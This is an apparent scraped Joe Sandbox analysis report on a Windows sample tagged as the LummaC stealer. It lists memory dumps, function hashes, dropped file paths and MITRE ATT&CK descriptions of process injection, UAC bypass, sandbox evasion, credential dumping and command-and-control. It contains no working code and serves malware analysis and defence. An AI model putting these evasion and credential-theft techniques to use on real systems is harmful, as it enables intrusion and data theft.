Associated: 00000003.00000002.2410439522.000000000054C000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410439522.0000000000555000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410481058.000000000055D000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410500531.000000000055F000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410520828.0000000000561000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410540532.0000000000562000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410560472.000000000056A000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410580265.000000000056C000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410599227.000000000056E000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410618983.0000000000571000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410664901.0000000000598000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410686905.00000000005A8000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410708390.00000000005AD000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410729059.00000000005BC000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410748551.00000000005BE000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410768859.00000000005CB000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410790174.00000000005CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410810700.00000000005CD000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410830315.00000000005D3000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410849397.00000000005D4000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410868545.00000000005D6000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410888893.00000000005E2000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410907540.00000000005E3000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410925804.00000000005E4000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410946858.00000000005EB000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410969050.00000000005FC000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410987941.00000000005FE000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2411024016.0000000000656000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2411024016.000000000065E000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2411067531.000000000066E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2411087241.0000000000670000.00000080.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3d0000_02FQBW3AYVFKS8DMY3O.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: a8e93b3dd63a9732b13b1833e81b400f27599f03cc89ff41a3c725df3f74604d
Instruction ID: fec3126e80e7d9c41b6cc4c80c4ca6f81fb2cf91c968406402225ddbf0218292
Opcode Fuzzy Hash: a8e93b3dd63a9732b13b1833e81b400f27599f03cc89ff41a3c725df3f74604d
Instruction Fuzzy Hash: D2D05E3144825F5ADB1AAF21885A29EBBB0EF17621F054149EC80628938B622C128B4D

Function 003DF30E Relevance: 1.3, APIs: 1, Instructions: 12memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000), ref: 003DF648

Memory Dump Source

Source File: 00000003.00000002.2410232852.00000000003DA000.00000040.00000001.01000000.00000006.sdmp, Offset: 003D0000, based on PE: true

Associated: 00000003.00000002.2410169939.00000000003D0000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410192583.00000000003D2000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410212626.00000000003D6000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410254476.00000000003E6000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410352178.0000000000538000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410372479.000000000053A000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410398169.000000000054A000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410419283.000000000054B000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410439522.000000000054C000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410439522.0000000000555000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410481058.000000000055D000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410500531.000000000055F000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410520828.0000000000561000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410540532.0000000000562000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410560472.000000000056A000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410580265.000000000056C000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410599227.000000000056E000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410618983.0000000000571000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410642224.0000000000586000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410664901.0000000000598000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410686905.00000000005A8000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410708390.00000000005AD000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410729059.00000000005BC000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410748551.00000000005BE000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410768859.00000000005CB000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410790174.00000000005CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410810700.00000000005CD000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410830315.00000000005D3000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410849397.00000000005D4000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410868545.00000000005D6000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410888893.00000000005E2000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410907540.00000000005E3000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410925804.00000000005E4000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410946858.00000000005EB000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410969050.00000000005FC000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410987941.00000000005FE000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2411024016.0000000000656000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2411024016.000000000065E000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2411067531.000000000066E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2411087241.0000000000670000.00000080.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3d0000_02FQBW3AYVFKS8DMY3O.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: fa78cc3c71b81d6a8294f3aa89a800ee6ecb2e9e0d846379cd5bb18b4c19263f
Instruction ID: 3e25f4f7574c258190866f37da9fb5034c954f270378e7b4f17dff16513ffd59
Opcode Fuzzy Hash: fa78cc3c71b81d6a8294f3aa89a800ee6ecb2e9e0d846379cd5bb18b4c19263f
Instruction Fuzzy Hash: 98D09E3654C74DDFCB017F74A48D29D3664FF05311F200A26ECA386F90D7314C609A1A

Non-executed Functions

Function 003E0709 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2410232852.00000000003DA000.00000040.00000001.01000000.00000006.sdmp, Offset: 003D0000, based on PE: true

Associated: 00000003.00000002.2410169939.00000000003D0000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410192583.00000000003D2000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410212626.00000000003D6000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410254476.00000000003E6000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410352178.0000000000538000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410372479.000000000053A000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410398169.000000000054A000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410419283.000000000054B000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410439522.000000000054C000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410439522.0000000000555000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410481058.000000000055D000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410500531.000000000055F000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410520828.0000000000561000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410540532.0000000000562000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410560472.000000000056A000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410580265.000000000056C000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410599227.000000000056E000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410618983.0000000000571000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410642224.0000000000586000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410664901.0000000000598000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410686905.00000000005A8000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410708390.00000000005AD000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410729059.00000000005BC000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410748551.00000000005BE000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410768859.00000000005CB000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410790174.00000000005CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410810700.00000000005CD000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410830315.00000000005D3000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410849397.00000000005D4000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410868545.00000000005D6000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410888893.00000000005E2000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410907540.00000000005E3000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410925804.00000000005E4000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410946858.00000000005EB000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410969050.00000000005FC000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410987941.00000000005FE000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2411024016.0000000000656000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2411024016.000000000065E000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2411067531.000000000066E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2411087241.0000000000670000.00000080.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3d0000_02FQBW3AYVFKS8DMY3O.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a24b381d382248ef58451a74661e6f2f19d3987fa9ae4e949f5f80a83142a1e4
Instruction ID: 497077a6c184f2be591839d346bd39650f9b4244a61261189ce0bd8980169697
Opcode Fuzzy Hash: a24b381d382248ef58451a74661e6f2f19d3987fa9ae4e949f5f80a83142a1e4
Instruction Fuzzy Hash: 64218072909168DBEB269F1AC8593FF73A8EB04304F1A072EDD4142AD0C7795CA4CA86

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\02FQBW3AYVFKS8DMY3O.exe.log

C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Imports

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

Windows Analysis Report
file.exe

Function 00559741 Relevance: 4.6, APIs: 3, Instructions: 66
registryCOMMON

Function 0054FB3B Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 205
fileCOMMON

Function 0054FDB2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 127
fileCOMMON

Function 0056FD36 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 120
COMMON

Function 0054FAC8 Relevance: 1.6, APIs: 1, Instructions: 128
fileCOMMON

Function 0054C9E8 Relevance: 1.6, APIs: 1, Instructions: 117
libraryCOMMON

Function 0054FB4A Relevance: 1.6, APIs: 1, Instructions: 98
fileCOMMON

Function 0054FB76 Relevance: 1.6, APIs: 1, Instructions: 96
fileCOMMON

Function 0054FBA9 Relevance: 1.6, APIs: 1, Instructions: 89
fileCOMMON

Function 04C30D42 Relevance: 1.6, APIs: 1, Instructions: 60
COMMON

Function 04C30D48 Relevance: 1.6, APIs: 1, Instructions: 59
COMMON

Function 0054F96E Relevance: 1.6, APIs: 1, Instructions: 59
fileCOMMON

Function 04C31509 Relevance: 1.6, APIs: 1, Instructions: 54
serviceCOMMON

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre